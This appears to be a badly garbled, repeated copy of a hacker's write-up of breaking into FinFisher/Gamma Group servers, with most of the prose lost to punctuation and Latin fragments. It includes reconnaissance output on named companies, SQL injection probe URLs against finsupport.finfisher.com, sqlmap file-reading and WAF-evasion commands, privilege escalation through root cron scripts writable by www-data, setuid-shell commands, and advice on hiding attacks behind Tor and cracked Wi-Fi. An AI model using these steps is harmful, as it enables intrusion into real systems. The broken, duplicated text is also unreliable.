___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
